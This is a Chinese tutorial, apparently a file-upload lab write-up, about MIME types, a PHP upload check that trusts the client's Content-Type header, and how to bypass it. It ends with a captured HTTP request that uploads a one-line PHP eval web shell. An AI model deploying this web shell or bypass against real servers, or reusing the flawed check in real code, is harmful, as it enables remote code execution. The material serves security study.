0x00 MIME简述
MIME (*M*ultipurpose *I*nternet *M*ail *E*xtensions) 是用来描述消息内容类型,和文件的扩展名有关系。
参考https://www.w3school.com.cn/media/media_mimeref.asp
以下是几种文件的扩展名对应的MIME类型
0x02 MIME识别
通过文件的扩展名识别
这种方式能对文件进行简单直观的判别,不能进行本质性的判别,一旦文件扩展名被修改了,就会判断失误。
通过文件数据的头部分识别
一般文件头记录了一些特征信息,可以利用这些特征信息对文件类型进行判别,这种方式较为本质,可信度较高。
参考https://mimesniff.spec.whatwg.org/
使用python识别文件MIME类型
python中使用filetype这个模块识别文件MIME类型,测试下识别图片结果如下。可以看出是通过识别内容的前4个字节识别。
import filetypedef main(): kind = filetype.guess('20200506001536.png') if kind is None: print('Cannot guess file type!') return print('File extension: %s' % kind.extension) print('File MIME type: %s' % kind.mime)if __name__ == '__main__': main()
打印如下File extension: pngFile MIME type: image/png
0x03 MIME检测原理
通过使用 PHP 的全局数组 $_FILES,你可以从客户计算机向远程服务器上传文件。这里判断了上传文件类型
是否image/jpeg,image/png,image/gif三种类型。如果不属于这三种类型就提示文件类型不正确,请重新上传。
$_FILES["file"]["name"] - 上传文件的名称$_FILES["file"]["type"] - 上传文件的类型$_FILES["file"]["size"] - 上传文件的大小,以字节计$_FILES["file"]["tmp_name"] - 存储在服务器的文件的临时副本的名称$_FILES["file"]["error"] - 由文件上传导致的错误代码
$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) { $temp_file = $_FILES['upload_file']['tmp_name']; $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'] if (move_uploaded_file($temp_file, $img_path)) { $is_upload = true; } else { $msg = '上传出错!'; } } else { $msg = '文件类型不正确,请重新上传!'; } } else { $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!'; }}
0x04 修改上传数据包中MIME类型绕过
将Content-Type: application/octet-stream修改为允许上传的类型如image/jpeg(Content-Type: image/jpeg)
即可上传成功。
POST /Pass-02/index.php HTTP/1.1Host: 192.168.181.138:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Referer: http://192.168.181.138:8080/Pass-02/index.phpDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------------------287393275228683Content-Length: 353-----------------------------287393275228683Content-Disposition: form-data; name="upload_file"; filename="xiaoma.php"Content-Type: application/octet-stream<?php eval(@$_POST['a']);phpinfo() ?>-----------------------------287393275228683Content-Disposition: form-data; name="submit"ä¸•ä¼ -----------------------------287393275228683--